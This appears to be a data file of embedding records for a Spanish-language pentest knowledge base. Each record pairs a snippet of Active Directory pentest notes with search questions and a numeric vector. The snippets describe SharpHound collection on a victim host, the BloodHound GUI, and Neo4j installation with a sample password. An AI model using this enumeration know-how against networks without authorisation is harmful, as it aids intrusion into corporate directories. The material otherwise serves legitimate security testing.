0.09925, 0.07965, 0.00666, 0.20444, 0.07012, -0.08487, -0.02746, 0.1094, -0.0158, 0.07418, 0.05609, 0.02147, -0.09158, 0.00831, -0.01181, 0.00033, -0.00338, 0.12829, -0.03491, 0.04647, 0.01355, 0.07264, -0.01455, 0.02366, 0.06999, -0.04924, 0.03084, 0.06273, 0.0167, -0.04498, 0.02203, 0.03326, -0.01005, -0.06813, 0.00951, 0.0683, -0.04271, 0.01301, -0.00579, 0.10723, 0.03627, -0.00669, -0.03999, -0.09659, -0.08176, -0.01498, 0.04871, -0.00686, 0.06318, 0.0422, -0.05379, -0.0289, -0.03037, -0.01893, -0.04943, -0.02288, 0.00853, 0.01608, -0.00753, 0.01266, -0.04757, 0.00794, 0.01272, 0.07161, 0.03757, -0.004, -0.00256, -0.01219, -0.09355, 0.07905, 0.0126, -0.00272, -0.0059, 0.0715, 0.04038, 0.05444, -0.02763, 0.03926, -0.09081, -0.05197, -0.02979, 0.05639, 0.04911, -0.02996, 0.02401, -0.0213, 0.01325, -0.04239, -0.00994, 0.00521, 0.0226, 0.0032, -0.03637, 0.03021, 0.00183, 0.04062, 0.01861, 0.06055, 0.02972, -0.02301, -0.06861, 0.03736, 0.00735, -0.06793, 0.00363, -0.01313, 0.08184, -0.02361, -0.05528, 0.01082, -0.00765, 0.00044, -0.03446, 0.00988, -0.02182, 0.01394, -0.0404, 0.00571, -0.00476, 0.05731, 0.00747, 0.03807, 0.06144, 0.02645, -0.06003, 0.04618, 0.03515, -0.0138, -0.00345, 0.03692, 0.01498, -0.02874, -0.03235, 0.0526, -0.04487, 0.03196, 0.02477, -0.00367, -0.02807, 0.00759, 0.06724, 0.0374, 0.02475, 0.02914, -0.04831, 0.00157, 0.01328, 0.03743, 0.03911, -0.03367, 0.06088, 0.00574, -0.03035, 0.00423, -0.04717, -0.0007, 0.03724, -0.02728, -0.03764, -0.00674, -0.04853, 0.00969, 0.00326, 0.03181, 0.04541, 0.0082]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "que programa puedo usar para mapear los usuarios de Active Directory desde una mΓ‘quina objetivo", "v": [-0.02023, 0.09283, -0.0734, -0.26838, -0.06184, -0.05213, -0.12487, -0.0307, -0.13146, -0.03071, -0.02853, -0.11203, 0.00298, -0.06447, -0.02689, -0.04661, 0.10744, -0.05048, -0.00097, -0.03232, 0.02643, 0.01918, -0.10058, 0.03271, -0.05561, 0.18515, 0.03342, -0.12094, -0.14498, -0.04756, 0.01139, 0.04348, 0.05827, -0.10502, 0.0191, -0.22221, 0.01286, -0.02076, 0.09047, 0.06744, -0.04028, -0.00518, -0.18371, 0.04655, 0.16491, 0.14059, 0.09751, -0.07297, 0.02044, 0.06645, -0.04987, -0.07357, -0.0553, 0.05814, 0.04631, -0.1171, 0.01808, -0.08453, -0.0206, -0.12241, -0.09984, -0.03375, -0.05889, -0.00144, -0.04098, -0.07522, 0.13489, -0.04588, -0.14505, 0.09285, -0.00265, 0.06732, 0.06163, 0.04643, 0.07309, 0.01334, 0.03305, -0.10175, -0.01999, -0.03752, 0.03094, -0.02255, -0.02875, 0.01067, -0.11227, -0.08355, 0.11647, -0.02597, 0.03819, -0.09024, 0.01873, 0.12227, 0.02903, 0.04796, 0.07205, -0.03498, 0.07425, 0.02089, 0.06799, 0.02827, 0.07238, -0.0555, 0.00802, 0.14538, -0.00208, 0.03984, 0.0446, 0.067, -0.0788, 0.04214, 0.02507, -0.07561, -0.0444, -0.0714, 0.01019, 0.04151, -0.02558, -0.0339, 0.03002, -0.05563, -0.08459, 0.04984, 0.04051, -0.01802, 0.11978, 0.03594, -0.0272, 0.09594, -0.05609, 0.02298, 0.02941, 0.07619, -0.02307, -0.0332, -0.09204, -0.02002, -0.00818, -0.05899, 0.00681, 0.00133, -0.05294, 0.05458, -0.05805, -0.00217, 0.01106, -0.06725, 0.03526, -0.05068, -0.02633, 0.01527, 0.0636, 0.01279, -0.00511, -0.00544, -0.00676, 0.08595, 0.01761, -0.02576, -0.08921, -0.01127, -0.08989, -0.01777, -0.03996, 0.00209, 0.04823, -0.03348, -0.03849, -0.0166, 0.07294, 0.08275, -0.02146, 0.08556, 0.0708, -0.0741, 0.02621, 0.01091, 0.01787, -0.00349, 0.03913, -0.01579, -0.04855, 0.01976, 0.03065, -0.0175, -0.04487, -0.00167, 0.01505, 0.02846, 0.03448, -0.02784, -0.03395, 0.08798, 0.07021, -0.03588, 0.01626, -0.07577, 0.00961, 0.08198, 0.01594, -0.08279, -0.04746, 0.0381, -0.00148, 0.00758, 0.02051, 0.06028, -0.00992, -0.02213, 0.03775, 0.04212, -0.00697, -0.02776, 0.06262, 0.02627, -0.05142, 0.00991, 0.03206, 0.03027, 0.01925, 0.01179, -0.01439, 0.00314, -0.0123, 0.06138, 0.0273, -0.04596, 0.02542, -0.00845, 0.02599, -0.00657, -0.00277, -0.0258, 0.00913, -0.02992, 0.00031, -0.01607, 0.0245, -0.01528, -0.0131, -0.06977, -0.04197, 0.10418, 0.03262, -0.00507, -0.04976, 0.00663, 0.00401, 0.01037, -0.03977, -0.01831, -0.01021, 0.00232, 0.06168, -0.02981, -0.03215, 0.07304]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "cual es la mejor herramienta visual para analizar las relaciones de confianza en mi red corporativa", "v": [-0.07575, 0.07254, -0.13549, -0.17984, 0.08227, -0.17511, 0.05564, 0.00374, -0.06567, -0.15491, 0.03437, -0.07023, -0.07063, 0.00416, 0.07605, 0.12774, 0.09494, -0.11204, 0.00739, 0.01649, 0.11714, -0.15002, -0.08223, -0.01597, 0.04837, 0.03206, 0.11273, -0.04735, 0.03249, 0.09073, 0.0727, 0.07615, 0.06827, 0.05364, -0.10284, 0.04778, -0.08587, 0.03663, -0.02519, -0.00354, -0.05746, 0.02356, -0.02348, 0.00375, 0.1455, 0.01364, -0.12794, 0.01921, -0.08093, 0.09057, -0.10264, -0.04126, -0.11149, -0.03422, 0.0515, -0.04962, 0.10823, -0.01585, 0.09839, -0.10097, -0.09634, 0.01138, 0.03603, 0.0537, -0.01931, -0.01614, 0.04134, -0.1354, -0.14147, 0.02025, -0.02427, -0.0068, -0.1308, -0.0235, 0.02916, 0.01072, 0.03005, 0.09933, 0.01848, -0.02173, 0.09646, 0.02047, -0.07309, 0.12439, -0.06421, -0.02217, 0.00565, 0.00682, 0.00432, -0.01476, -0.01053, -0.05083, -0.08083, -0.03118, -0.05852, -0.01634, 0.01685, -0.04239, -0.04542, 0.02683, 0.01469, -0.05174, -0.10541, 0.00344, -0.02496, -0.01814, -0.05934, -0.06238, -0.02666, -0.03374, 0.05684, 0.02568, -0.02759, -0.00055, -0.01997, -0.05724, 0.01483, -0.04119, -0.04505, -0.06775, 0.00396, -0.03702, -0.04158, 0.01508, -0.08633, -0.05596, -0.00278, 0.03257, 0.00048, -0.02678, -0.11263, -0.03548, -0.14741, -0.01914, -0.06253, -0.01781, 0.01828, -0.07436, 0.0023, -0.13485, -0.01141, 0.01755, 0.00024, -0.08045, 0.06489, 0.09213, 0.03083, -0.03668, -0.01639, 0.11492, 0.00945, -0.01901, -0.06928, 0.01967, -0.02078, 0.05115, -0.03845, -0.01642, -0.01194, 0.0497, 0.03187, -0.07984, 0.03295, 0.11663, 0.09232, -0.02219, -0.04251, 0.00317, 0.09671, 0.02887, 0.03428, -0.0185, -0.0721, -0.05007, 0.0005, -0.08392, -0.00123, -0.08882, -0.02502, -0.10863, -0.03836, -0.00585, -0.00702, 0.02327, 0.0124, -0.03474, -0.04594, 0.00062, 0.01902, -0.08349, -0.03409, -0.01114, 0.00968, -0.05035, 0.12621, -0.06001, 0.0011, -0.08992, 0.00057, -0.02045, -0.04117, -0.10649, -0.0176, -0.02203, 0.04385, 0.08807, 0.00012, 0.05307, -0.03368, 0.04066, 0.01453, 0.01232, 0.00706, -0.08081, -0.06198, -0.07364, 0.0378, -0.00579, 0.0107, 0.01232, 0.06399, -0.01456, 0.09031, -0.08087, -0.06505, -0.00347, -0.01863, -0.00997, -0.05529, -0.00822, 0.00948, 0.05107, -0.02303, -0.05055, 0.02317, 0.00361, 0.05669, -0.09732, -0.02847, -0.08977, 0.08584, 0.0398, -0.07871, -0.02905, -0.06177, -0.03658, -0.0791, 0.0366, -0.03717, -0.08151, -0.00602, 0.04173, 0.07388, -0.03362, 0.02287, -0.0363]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "- **SharpHound** = el \"recolector\" que enumera AD. Hay versiΓ³n `.exe` (subes a vΓ­ctima) y `.py` (corres desde Kali si ya tienes creds y conectividad).\n- **BloodHound GUI** = la interfaz grΓ‘fica donde cargas el JSON y haces queries.\n- **Neo4j** = la base de datos del grafo (la GUI la necesita).", "indexar": "necesito conectar datos de un grafo de Active Directory, que base de datos o servicio recomendarΓ­as?", "v": [-0.00237, 0.14502, -0.12905, -0.19497, 0.1537, -0.10047, -0.00604, -0.00707, -0.08139, 0.01819, -0.06417, -0.23952, -0.13102, -0.12415, 0.04994, 0.02777, 0.078, -0.05704, -0.03942, -0.04388, -0.01565, 0.03349, -0.08705, -0.03068, -0.14364, -0.00842, 0.03336, -0.06917, -0.08848, 0.16046, 0.04707, -0.12549, -0.07745, -0.06171, -0.05298, -0.03989, -0.02931, 0.05795, 0.06801, -0.06751, -0.06383, 0.02349, -0.10953, 0.09109, 0.06161, 0.0178, -0.03977, -0.07881, -0.03947, 0.01166, -0.05335, -0.08101, -0.11848, -0.04765, -0.07054, -0.03142, 0.0535, -0.06722, 0.02103, -0.04777, 0.01289, -0.00182, -0.0357, -0.0163, -0.02441, -0.02271, 0.07736, -0.04364, -0.03479, 0.09586, -0.00226, 0.1053, -0.06927, 0.07787, 0.08154, -0.01062, 0.13278, -0.06704, 0.00142, 0.09588, 0.01203, 0.02103, -0.04097, 0.01825, -0.14866, 0.01459, 0.07559, 0.03189, -0.01314, -0.00565, 0.12348, 0.07904, -0.11299, 0.06336, 0.06284, 0.10596, 0.02422, -0.0003, 0.06411, -0.00112, 0.05834, 0.04571, -0.00646, 0.10463, 0.05489, 0.00443, 0.00944, 0.06675, -0.10493, 0.03912, -0.05107, -0.05502, 0.03489, -0.06467, 0.05371, -0.04071, -0.03787, -0.07597, 0.01985, 0.07268, -0.03278, -0.06023, 0.11019, 0.0028, -0.11657, 0.01027, -0.05505, 0.05175, 0.08223, 0.10353, 0.00214, 0.06252, -0.04843, -0.09219, 0.00274, 0.09843, -0.01789, -0.05466, 0.02399, -0.10515, -0.00347, 0.01577, -0.04155, 0.01172, 0.0392, -0.00544, 0.06176, 0.06274, -0.06385, 0.03356, -0.03406, 0.07283, 0.0047, 0.05817, -0.00849, 0.03361, 0.05986, -0.08059, -0.00426, 0.03373, 0.02115, 0.0169, 0.0251, 0.05715, -0.03081, -0.0494, -0.03182, 0.04422, 0.07626, 0.03943, -0.07487, 0.08623, -0.00939, -0.12654, 0.06419, -0.01365, -0.06665, -0.06567, -0.03529, -0.0007, 0.0371, -0.03038, 0.00671, 0.01302, -0.01338, 0.02837, 0.01217, -0.09154, 0.04202, -0.01653, -0.01186, 0.08282, -0.0025, 0.00169, 0.0214, -0.12824, 0.00249, 0.01849, 0.03105, -0.01497, -0.04628, 0.05422, -0.08139, 0.00906, -0.01208, 0.03588, -0.02662, 0.01346, 0.04234, -0.03769, -0.02166, -0.03371, 0.05408, -0.00163, -0.0707, -0.01621, 0.05388, -0.03252, 0.00723, 0.02887, -0.05478, 0.05693, 0.01604, -0.01451, -0.01064, -0.04599, 0.04448, 0.00118, 0.04402, -0.00518, -0.00068, 0.01049, 0.01164, -0.02098, 0.03581, 0.02134, -0.04106, -0.06627, -0.04789, -0.05722, 0.07344, 0.07873, -0.05178, 0.00698, 0.01773, -0.06069, -0.0888, 0.04874, 0.02116, -0.11702, 0.01713, -0.01289, 0.0412, -0.04028, 0.00423, -0.04923]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### InstalaciΓ³n en Debian\n\n```bash\nsudo apt install -y bloodhound bloodhound.py\n```\n\n```bash", "indexar": "que programa sirve para recopilar informaciΓ³n de credenciales en una red?", "v": [-0.03018, 0.01588, -0.10588, -0.18125, 0.24057, -0.20795, 0.0341, -0.02653, 0.01301, -0.18478, -0.10008, -0.09408, -0.0143, -0.22089, 0.12943, 0.06945, -0.02214, 0.006, 0.13871, 0.00996, 0.01577, -0.03786, -0.10357, -0.05124, -0.02357, 0.09606, 0.01388, -0.06084, 0.06876, 0.08827, 0.01238, -0.03643, -0.0499, -0.06428, -0.07208, 0.11033, -0.00901, 0.07221, -0.09725, 0.05815, -0.0677, 0.02009, -0.00088, 0.04195, 0.09017, -0.04652, 0.02835, 0.02356, -0.10749, -0.02657, -0.00083, -0.07406, -0.09189, -0.0948, 0.00836, -0.06589, -0.08682, -0.10251, -0.12871, 0.04783, 0.0628, -0.05289, 0.03185, 0.00603, 0.0305, -0.01901, 0.04335, -0.04685, -0.03324, 0.01708, -0.0018, 0.03998, 0.06401, -0.02026, -0.07243, -0.04267, 0.01769, -0.0435, 0.05438, -0.07176, 0.0359, -0.03204, -0.0039, 0.02952, 0.03741, -0.03681, 0.09841, -0.05908, -0.05178, -0.036, 0.04846, 0.12059, 0.03771, 0.0509, 0.12985, 0.01001, 0.11281, -0.00425, 0.00993, 0.07706, -0.00755, -0.08399, -0.05141, 0.0204, -0.07403, 0.14815, 0.04789, 0.00365, 0.03854, 0.0144, 0.03678, 0.01693, 0.01031, -0.00027, 0.00125, 0.00077, -0.00804, 0.01392, 0.06079, -0.03605, -0.035, 0.02532, -0.05323, -0.02644, 0.03374, 0.03532, -0.1188, 0.039, -0.03679, 0.04465, -0.05121, 0.01858, -0.03708, -0.03044, -0.01156, -0.11587, -0.02755, -0.05882, 0.00282, -0.02697, 0.01258, 0.06495, -0.06645, -0.05905, -0.01347, 0.03661, 0.03728, -0.05401, 0.08796, -0.01501, 0.03655, 0.04855, -0.0021, 0.00511, -0.01101, -0.00652, 0.09466, -0.03254, -0.08379, 0.04406, -0.05655, -0.06594, 0.00665, -0.02062, 0.02914, -0.05844, 0.05225, 0.00723, 0.08765, 0.05463, 0.00606, 0.03713, -0.03203, -0.11201, -0.07218, -0.01624, -0.03595, -0.09273, 0.00016, -0.04835, -0.01609, -0.01269, 0.0505, 0.01639, 0.01161, -0.0177, -0.0568, 0.03298, -0.01336, -0.08402, -0.01503, -0.07527, 0.05227, 0.00902, 0.0283, 0.0457, 0.05662, 0.02488, 0.06656, -0.00152, -0.08844, 0.02661, -0.00538, 0.05783, 0.03794, 0.12693, 0.00445, 0.02561, 0.06471, 0.14067, -0.00158, 0.01178, 0.04344, -0.03673, -0.08399, -0.08141, 0.02402, 0.05239, 0.02922, 0.0255, 0.067, -0.05149, -0.04195, 0.09327, -0.02155, -0.09893, 0.06643, -0.02386, 0.01602, 0.03328, 0.0497, -0.03389, 0.00025, -0.0047, -0.02669, -0.05528, 0.01307, 0.083, -0.01177, -0.13151, -0.05902, 0.04906, -0.03714, -0.05173, -0.00734, 0.00679, -0.03463, 0.00088, 0.04757, -0.04364, -0.06071, 0.02641, 0.03417, -0.0327, 0.06346, 0.03007]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### InstalaciΓ³n en Debian\n\n```bash\nsudo apt install -y bloodhound bloodhound.py\n```\n\n```bash", "indexar": "cual es la herramienta que me permite analizar las credenciales del sistema?", "v": [-0.08377, 0.10731, -0.05144, -0.10675, 0.09087, -0.11145, -0.04622, -0.04204, -0.16724, -0.07806, -0.09604, 0.02486, -0.08995, -0.09817, 0.15539, 0.05388, 0.01319, -0.13176, 0.02615, 0.03732, -0.00091, -0.14836, -0.15939, -0.07056, -0.12282, 0.01453, 0.03808, -0.0603, -0.10665, 0.0649, -0.04324, 0.05133, 0.00298, -0.09904, -0.05899, 0.01112, -0.09443, 0.08924, -0.0153, 0.10296, -0.02768, -0.01133, -0.01435, 0.02875, 0.10551, -0.05947, -0.08705, 0.03897, -0.04177, 0.01744, -0.07305, -0.10861, -0.10935, -0.02515, 0.06533, -0.16133, 0.14311, -0.06462, 0.09192, -0.15285, -0.07267, 0.06771, 0.00368, -0.0629, 0.01469, -0.02337, 0.01137, -0.11783, -0.0758, 0.08918, 0.00336, -0.01446, 0.04784, 0.01638, -0.02212, -0.00029, 0.04024, 0.08181, 0.08063, -0.0212, 0.09967, -0.03937, -0.08939, 0.11156, 0.02048, -0.03947, 0.03684, -0.01279, -0.02326, 0.01906, -0.0242, 0.02458, 0.03447, 0.06062, 0.03124, -0.01215, 0.04608, -0.02553, -0.05979, 0.00383, 0.11933, -0.07388, -0.12205, 0.08589, -0.03835, 0.02287, -0.02876, -0.00754, -0.04011, -0.05711, 0.02321, 0.06636, 0.02024, -0.02259, 0.01982, 0.03583, -0.02178, -0.02723, -0.05663, -0.09507, 0.05738, 0.05042, -0.0581, -0.12302, 0.05336, -0.00621, -0.05459, 0.04904, 0.00453, -0.04669, -0.00017, -0.01412, -0.0996, 0.04435, -0.04173, -0.07999, -0.02478, -0.08952, -0.03874, -0.01876, -0.008, 0.05734, -0.02249, -0.12904, 0.06895, 0.02115, 0.00547, -0.0917, -0.01876, -0.05718, -0.01992, 0.05208, -0.01042, -0.00556, -0.03399, -0.00432, 0.01637, -0.04524, -0.09909, 0.00679, -0.01928, -0.0843, 0.10021, 0.02017, 0.01609, -0.07414, 0.0448, -0.04866, 0.09498, 0.0354, 0.02129, -0.00339, 0.02447, 0.01999, 0.05002, -0.04649, -0.04536, -0.08843, -0.01145, -0.07154, -0.0383, 0.03658, -0.00231, -0.04515, -0.0279, 0.01537, -0.04524, 0.04588, -0.00643, 0.03946, 0.0708, 0.04448, 0.01168, -0.0409, 0.06608, 0.02929, -0.00227, -0.10222, 0.05301, 0.01821, -0.10495, 0.01043, 0.0155, -0.09249, 0.01195, 0.10354, 0.03894, 0.01009, 0.01322, 0.06232, 0.02517, -0.02653, 0.076, -0.04959, -0.061, -0.00999, -0.02539, 0.02018, -0.02862, -0.05813, 0.05653, -0.00641, 0.07779, 0.00674, -0.07335, -0.0099, 0.00137, 0.05693, -0.00471, -0.04162, -0.0027, -0.08527, -0.02297, -0.01262, 0.02278, -0.05463, 0.01023, -0.03649, -0.06815, -0.0824, 0.04439, 0.10659, -0.01025, -0.03457, -0.05966, -0.03892, -0.0413, -0.03455, -0.02483, -0.1191, -0.02294, 0.04209, 0.06632, -0.07516, 0.06976, -0.04811]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### InstalaciΓ³n en Debian\n\n```bash\nsudo apt install -y bloodhound bloodhound.py\n```\n\n```bash", "indexar": "con que puedo instalar BloodHound para auditorΓ­as de seguridad?", "v": [-0.01551, 0.01946, 0.02436, -0.12602, 0.02177, 0.00067, -0.06515, -0.06123, -0.04716, 0.08268, -0.13757, -0.04976, -0.00332, 0.07406, -0.04299, -0.08671, -0.0082, -0.1052, -0.01204, 0.039, 0.08094, -0.03248, -0.09981, 0.07011, -0.04475, 0.12222, 0.08574, 0.11291, -0.03646, -0.12494, -0.02376, -0.08844, 0.08108, 0.0908, -0.14437, 0.00689, -0.05812, 0.0543, 0.1121, 0.15868, 0.00335, 0.01657, 0.14412, -0.03666, 0.15915, -0.08515, 0.01793, -0.00785, 0.11147, -0.00695, 0.00032, 0.08405, -0.15646, -0.08957, -0.00935, -0.0903, 0.0234, -0.1066, 0.07685, -0.06482, -0.12941, 0.04836, 0.013, 0.10529, -0.01602, 0.07505, 0.04057, 0.02247, -0.00234, 0.06579, -0.03523, -0.02013, -0.10318, 0.06168, -0.08944, -0.09786, 0.00598, -1e-05, 0.0776, 0.04724, 0.0363, 0.03538, 0.02729, 0.00348, -0.10493, -0.05709, -0.0688, 0.01163, 0.03894, 0.09071, -0.00276, -0.07393, 0.01266, 0.0096, -0.034, -0.10744, 0.12512, 0.00322, -0.04059, -0.07436, -0.02082, -0.03119, -0.00456, 0.15116, 0.0751, -0.03556, -0.06075, -0.05928, 0.07249, -0.09635, -0.03919, 0.07654, -0.15601, -0.02595, -0.04932, -0.03623, 0.12718, 0.05533, 0.04194, 0.05538, -0.0218, -0.01761, -0.04919, 0.07047, -0.06136, -0.09141, 0.00864, 0.0419, 0.0016, 0.00214, 0.03916, -0.01858, -0.05014, -0.02678, -0.07567, 0.06047, -0.14916, -0.06114, -0.05368, -0.0266, -0.04254, 0.03562, 0.09414, 0.05734, 0.00328, 0.06903, -0.07314, -0.03522, -0.0339, -0.00496, 0.03926, 0.02806, -0.07568, 0.02711, -0.05119, 0.03367, 0.08257, -0.02078, 0.02916, 0.01171, 0.02095, -0.02381, 0.05695, 0.00271, -0.06517, 0.0946, -0.02515, -0.05211, 0.02915, -0.03256, 0.00113, 0.02251, 0.02417, -0.02247, 0.02994, -0.04455, 0.01681, -0.17448, 0.04139, -0.04106, -0.0122, 0.03659, -0.03172, 0.01156, 0.10127, -0.10289, 0.0348, 0.00465, 0.03718, 0.00018, 0.08033, 0.0414, 0.00984, 0.0073, -0.01659, -0.00209, 0.04181, -0.10598, -0.08666, -0.01902, -0.04831, 0.01125, -0.07875, -0.02764, 0.12392, -0.00331, 0.01524, 0.09663, -0.03688, 0.00694, 0.05063, 0.00316, 0.01389, -0.0731, 0.01317, 0.00699, 0.0321, -0.01016, -0.08949, 0.06305, -0.01252, -0.01131, 0.02642, -0.00879, -0.05795, -0.03841, -0.00051, -0.04371, 0.06438, 0.02111, -0.05621, 0.0386, -0.07955, -0.02877, 0.00342, 0.05189, -0.00809, -0.0064, 0.01269, -0.04419, 0.03134, 0.04122, -0.01268, -0.07238, -0.05908, -0.07167, 0.00664, 0.02072, 0.00839, -0.06468, 0.00763, 0.02112, 0.04789, 0.00258, -0.0058, -0.02266]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "que herramienta es la base de datos para BloodHound?", "v": [-0.18095, -0.00763, 0.02863, -0.12932, -0.04617, -0.02157, -0.09268, -0.06007, 0.03276, 0.03169, -0.0927, -0.13123, -0.03511, -0.01954, -0.02962, 0.00575, -0.03852, -0.15716, -0.08488, -0.05662, -0.06389, -0.01065, -0.12789, 0.06096, -0.15907, 0.00281, 0.07844, 0.13463, -0.17804, 0.11622, -0.01912, -0.13506, -0.05356, 0.04609, -0.07942, -0.03135, -0.10148, 0.0742, -0.00049, 0.04806, -0.03194, 0.00037, 0.0141, -0.01839, 0.05714, 0.04352, -0.05731, 0.06884, 0.11238, 0.03628, -0.0062, -0.04532, -0.20358, -0.09144, -0.03227, -0.17177, 0.11796, -0.16241, 0.03083, -0.02169, -0.07112, -0.01534, -0.02644, -0.02716, -0.04388, -0.02039, 0.05352, -0.07188, -0.02021, 0.15902, 0.01832, 0.06729, -0.05888, -0.05018, 0.00221, -0.12452, 0.13447, 0.06124, 0.05368, 0.00587, -0.01822, 0.02237, -0.06561, 0.01682, -0.03813, -0.03092, 0.14978, -0.00281, 0.05604, 0.00785, 0.03258, 0.04945, -0.06494, 0.08471, 0.0272, -0.03023, 0.03498, -0.10524, 0.02169, -0.04595, 0.09986, 0.03322, -0.11104, 0.07135, 0.08281, -0.00773, -0.04261, -0.01988, -0.10615, -0.04459, 0.00934, -0.00331, -0.03155, 0.05987, 0.00279, -0.01398, 0.10567, 0.03573, 0.04628, -0.02958, 0.05359, 0.01947, -0.00914, -0.03229, -0.08399, -0.04289, -0.12564, 0.04621, -0.00778, -0.00344, -0.02985, 0.05721, -0.10984, 0.02573, 0.02495, 0.0873, -0.05288, -0.10807, 0.05299, -0.09839, -0.05601, 0.04032, 0.00101, 0.00607, 0.04048, -0.0325, 0.02315, 0.01987, -0.05396, 0.00142, 0.03687, 0.01034, 0.03684, 0.04288, -0.10036, 0.01302, -0.00258, 0.02692, -0.09829, 0.01222, -0.06429, -0.06763, -0.0216, 0.00019, -0.03782, 0.02513, 0.06106, 0.04711, 0.01871, 0.02782, 0.04953, 0.03038, 0.06895, -0.00833, 0.02378, -0.05868, -0.06775, -0.11464, -0.07338, -0.01086, 0.04653, -0.04097, -0.04407, -0.0029, 0.08743, -0.03802, 0.04854, -0.0565, 0.01412, -0.02075, 0.01587, 0.10432, 0.12491, -0.04966, 0.02093, -0.01089, 0.03076, -0.05056, 0.08699, -0.03445, -0.03884, 0.02402, -0.05136, 0.03122, 0.01351, 0.04739, -0.0018, -0.04643, -0.05125, -0.03976, -0.01969, -0.01264, 0.00698, -0.01855, 0.01931, -0.01687, 0.01297, -0.00497, -0.03919, -0.01013, -0.00736, 0.05735, 0.03486, -0.01223, -0.10899, 0.02436, 0.03202, -0.02475, 0.07127, -0.05979, 0.01535, -0.01355, -0.0229, -0.01525, -0.00208, 0.02604, 0.00484, -0.02093, -0.02999, -0.02516, 0.02936, 0.05189, -0.01627, -0.06621, 0.00518, -0.06101, -0.02162, 0.0054, 0.00466, -0.09248, -0.00716, -0.06051, 0.06881, -0.02637, -0.00316, -0.0226]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "indexar": "cual puedo instalar en linux como base de datos para BloodHound?", "v": [-0.15647, 0.0302, 0.0304, -0.05883, -0.01119, -0.083, -0.10189, -0.05492, -0.13965, 0.02482, -0.09093, -0.17419, -0.04401, -0.01681, -0.07264, -0.07842, -0.1027, -0.19639, -0.03716, -0.13135, -0.08003, -0.0303, -0.15099, 0.00947, -0.03767, 0.0837, 0.09783, 0.04233, -0.08994, -0.02962, -0.0233, -0.13075, -0.03126, 0.09627, -0.0676, 0.0015, -0.07012, 0.07949, 0.07336, 0.08966, 0.04805, -0.0122, 0.02711, -0.00033, 0.03978, -0.06331, 0.01563, -0.04029, 0.14367, -0.10859, 0.03052, 0.10565, -0.1425, -0.13876, 0.02845, -0.08195, 0.10404, -0.1763, 0.09314, 0.06482, -0.10231, 0.01698, -0.01583, 0.01042, 0.0159, 0.02039, -0.03276, 0.00756, -0.06004, 0.0948, -0.00704, 0.14009, -0.07702, -0.07279, -0.01119, -0.01076, 0.02539, 0.01104, 0.12506, -0.00633, -0.01584, 0.02508, 0.00704, 0.00981, -0.06394, -0.06826, 0.08972, -0.00343, 0.02755, 0.0568, 0.06342, -0.01565, -0.06243, 0.12548, 0.09665, -0.06326, 0.03357, 0.00484, 0.03419, -0.07149, -0.04202, 0.08421, -0.08001, 0.16797, 0.06758, -0.06241, 0.02578, -0.06239, -0.0464, -0.12966, -0.00786, -0.02258, -0.06225, 0.03619, -0.0119, -0.09101, 0.08242, 0.04463, 0.00686, 0.02801, -0.06608, -0.01687, 0.00205, 0.03846, -0.03158, -0.05736, -0.06127, 0.07353, -0.00708, 0.04693, -0.01166, -0.01495, -0.02166, -0.00596, -0.04067, 0.09214, -0.02446, -0.05326, -0.01001, -0.07595, -0.00489, 0.06231, 0.0356, 0.0483, 0.05587, 0.01714, -0.01325, 0.00786, -0.04678, -0.04566, 0.0254, 0.09115, 0.03637, 0.06569, -0.11537, -0.01211, 0.05872, -0.02093, 0.00124, -0.02169, -0.02277, 0.0082, -0.02807, -0.00343, -0.06376, 0.07239, -0.04955, 0.05037, 0.03238, 0.04039, 0.01351, 0.07357, 0.00668, -0.04516, 0.08537, -0.09015, -0.01594, -0.14299, -0.02819, 0.02053, 0.04563, 0.02252, -0.00944, 0.00251, 0.06479, -0.01913, 0.00379, -0.04121, 0.00405, -0.0445, 0.06573, 0.08553, 0.02731, -0.04806, 0.00311, -0.0251, -0.00249, -0.04636, 0.00219, -0.02848, -0.05877, 0.0736, -0.08114, 0.03005, 0.07874, -0.00927, -0.02505, 0.0074, -0.05566, 0.00134, 0.00602, 0.00348, 0.03943, -0.01863, -0.00715, -0.00608, 0.04105, -0.03994, 0.01459, 0.00547, -0.03646, 0.03983, 0.0552, -0.01553, -0.09674, -0.05408, 0.0206, -0.0234, 0.04897, -0.02116, 